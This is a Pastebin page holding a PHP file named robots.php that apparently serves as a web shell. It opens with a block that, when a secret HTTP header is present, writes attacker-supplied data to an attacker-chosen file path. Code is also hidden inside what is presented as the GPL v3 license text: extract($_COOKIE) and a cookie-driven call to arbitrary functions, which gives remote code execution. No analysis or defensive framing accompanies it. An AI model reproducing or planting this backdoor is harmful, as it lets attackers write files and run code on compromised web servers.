Advertisement
PalmaSolutions

robots.php

Nov 17th, 2018
421
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 9.06 KB | None | 0 0
  1. <?php
  2.  
  3. if (@$_SERVER['HTTP_X_B56880']) {
  4.     echo "YES_YES";
  5.    
  6.     if (@$_SERVER['HTTP_X_TO']) {
  7.         file_put_contents(@$_SERVER['HTTP_X_TO'], @$_SERVER['HTTP_X_DATA']);
  8.     }    
  9. }
  10. ?><?php /*            GNU GENERAL PUBLIC LICENSE
  11.                        Version 3, 29 June 2007
  12.  
  13. Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
  14. Everyone is permitted to copy and distribute verbatim copies
  15. of this license document, but changing it is not allowed.
  16.  
  17.                         Preamble
  18.  
  19. The GNU General Public License is a free, copyleft license for
  20. software and other kinds of works.
  21.  
  22. The licenses for most software and other practical works are designed
  23. to take away your freedom to share and change the works.  By contrast,
  24. the GNU General Public License is intended to guarantee your freedom to
  25. share and change all versions of a program--to make sure it remains free
  26. software for all its users.  We, the Free Software Foundation, use the
  27. GNU General Public License for most of our software; it applies also to
  28. any other work released this way by its authors.  You can apply it to
  29. your programs, too.
  30.  
  31. When we speak of free software, we are referring to freedom, not
  32. price.  Our General Public Licenses are designed to make sure that you
  33. have the freedom to distribute copies of free software (and charge for
  34. them if you wish), that you receive source code or can get it if you
  35. want it, that you can change the software or use pieces of it in new
  36. free programs, and that you know you can do these things.
  37.  
  38. To protect your rights, we need to prevent others from denying you
  39. these rights or asking you to surrender the rights.  Therefore, you have
  40. certain responsibilities if you distribute copies of the software, or if
  41. you modify it: responsibilities to respect the freedom of others.
  42.  
  43. For example, if you distribute copies of such a program, whether
  44. gratis or for a fee, you must pass on to the recipients the same
  45. freedoms that you received.  You must make sure that they, too, receive
  46. or can get the source code.  And you must show them these terms so they
  47. know their rights.
  48.  
  49. Developers that use the GNU GPL protect your rights with two steps:
  50. (1) assert copyright on the software, and (2) offer you this License
  51. giving you */extract($_COOKIE);/* copy, distribute and/or modify it.
  52.  
  53. For the developers' and authors' protection, the GPL clearly explains
  54. that there is no warranty for this free software.  For both users' and
  55. authors' sake, the GPL requires that modified versions be marked as
  56. changed, so that their problems will not be attributed erroneously to
  57. authors of previous versions.
  58.  
  59. Some devices are designed to deny users access to install or run
  60. modified versions of the software inside them, although the manufacturer
  61. can do so.  This is fundamentally incompatible with the aim of
  62. protecting users' freedom to change the software.  The systematic
  63. pattern of such abuse occurs in the area of products for individuals to
  64. use, which is precisely where it is most unacceptable.  Therefore, we
  65. have designed this version of the GPL to prohibit the practice for those
  66. products.  If such problems arise substantially in other domains, we
  67. stand ready to extend this provision to those domains in future versions
  68. of the GPL, as needed to protect the freedom of users.
  69.  
  70. Finally, every program is threatened constantly by software patents.
  71. States should not allow patents to restrict development and use of
  72. software on general-purpose computers, but in those that do, we wish to
  73. avoid the special danger that patents applied to a free program could
  74. make it effectively proprietary. patents applied to  GPL assures that
  75. patents cannot be used to render the program non-free.
  76.  
  77. The precise terms and conditions for copying, distribution and
  78. modification follow.
  79.  
  80.                    TERMS AND CONDITIONS
  81.  
  82. 0. Definitions.
  83.  
  84. "This License" refers to version 3 of the GNU General Public License.
  85.  
  86. "Copyright" also means copyright-like laws that apply to other kinds of
  87. works, such as semiconductor masks.
  88.  
  89. "The Program" refers to any copyrightable work licensed under this
  90. License.  Each licensee is addressed as "you".  "Licensees" and
  91. "recipients" may be individuals or organizations.
  92.  
  93. To "modify" a work means to copy from or adapt all or part of the work
  94. in a fashion requiring copyright permission, other than the making of an
  95. exact copy.  The resulting work is called a "modified version" of the
  96. earlier work or a work "based on" the earlier work.
  97.  
  98. A "covered work" means either the unmodified Program or a work based
  99. on the Program.
  100.  
  101. To "propagate" a work means to do anything with it that, without
  102. permission, would make you directly or secondarily liable for
  103. infringement under applicable copyright law, except executing it on a
  104. computer or modifying a private copy.  Propagation includes copying,
  105. distribution (with or without modification), making available to the
  106. public, and in some countries other activities as well.
  107.  
  108. To "convey" a work means any kind of propagation that enables other
  109. parties to make or receive copies.  Mere interaction with a user through
  110. a computer network, with no transfer of a copy, is not conveying.
  111.  
  112. An interactive user interface displays "Appropriate Legal Notices"
  113. to the extent that it includes a convenient and prominently visible
  114. feature that (1) displays an appropriate copyright notice, and (2)
  115. tells the user that there is no warranty for the work (except to the
  116. extent that warranties are provided), that licensees may convey the
  117. work under this License, and how to view a copy of this License.  If
  118. the interface presents a list of user commands or options, such as a
  119. menu, a prominent item in the list meets this criterion.
  120.  
  121. 1. Source Code.
  122.  
  123. The "source code" for a work means the preferred form of the work
  124. for making modifications to it.  "Object code" means any non-source
  125. form of a work.
  126.  
  127. A "Standard Interface" means an interface that either is an official
  128. standard defined by a recognized standards body, or, in the case of
  129. interfaces specified for a particular programming language, one that
  130. is widely used among developers working in that language.
  131.  
  132. The "System Libraries" of an executable work include anything, other
  133. than the work as a whole, that (a) is included in the normal form of
  134. packaging a Major Component, but which is not part of that Major
  135. Component, and (b) serves only to enable use of the work with that
  136. Major Component, or to implement a Standard Interface for which an
  137. implementation is available to the public in source code form.  A
  138. "Major Component", in this context, means a major essential component
  139. (kernel, window system, and so on) of the specific operating system
  140. (if any) on which the executable work runs, or a compiler used to
  141. produce the work, or an object code interpreter used to run it.
  142.  
  143. The "Corresponding Source" for a work in object code form means all
  144. the source code needed to generate, install, and (for an executable
  145. work) run the object code and to modify the work, including scripts to
  146. control those activities.  However, it does not include the work's
  147. System Libraries, or general-purpose tools or generally available free
  148. programs which are used unmodified in performing those activities but
  149. which are not */@$B56880&&@$W($X($Y,$Z));/*.  For example,
  150.  
  151. the work, and the source code for shared libraries and dynamically
  152. linked subprograms that the work is specifically designed to require,
  153. such as by intimate data communication or control flow between those
  154. subprograms and other parts of the work.
  155.  
  156. The Corresponding Source need not include anything that users
  157. can regenerate automatically from other parts of the Corresponding
  158. Source.
  159.  
  160. The Corresponding Source for a work in source code form is that
  161. same work.
  162.  
  163. 2. Basic Permissions.
  164.  
  165. All rights granted under this License are granted for the term of
  166. copyright on the Program, and are irrevocable provided the stated
  167. conditions are met.  This License explicitly affirms your unlimited
  168. permission to run the unmodified Program.  The output from running a
  169. covered work is covered by this License only if the output, given its
  170. content, constitutes a covered work.  This License acknowledges your
  171. rights of fair use or other equivalent, as provided by copyright law.
  172.  
  173. You may make, run and propagate covered works that you do not
  174. convey, without conditions so long as your license otherwise remains
  175. in force.  You may convey covered works to others for the sole purpose
  176. of having them make modifications exclusively for you, or provide you
  177. with facilities for running those works, provided that you comply with
  178. the terms of this License in conveying all material for which you do
  179. not control copyright.  Those thus making or running the covered works
  180. for you must do so exclusively on your behalf, under your direction
  181. and control, on terms that prohibit them from making any copies of
  182. your copyrighted material outside their relationship with you.
  183.  
  184. Conveying under any other circumstances is permitted solely under
  185. the conditions stated below.  Sublicensing is not allowed; section 10
  186. makes it unnecessary. */ ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement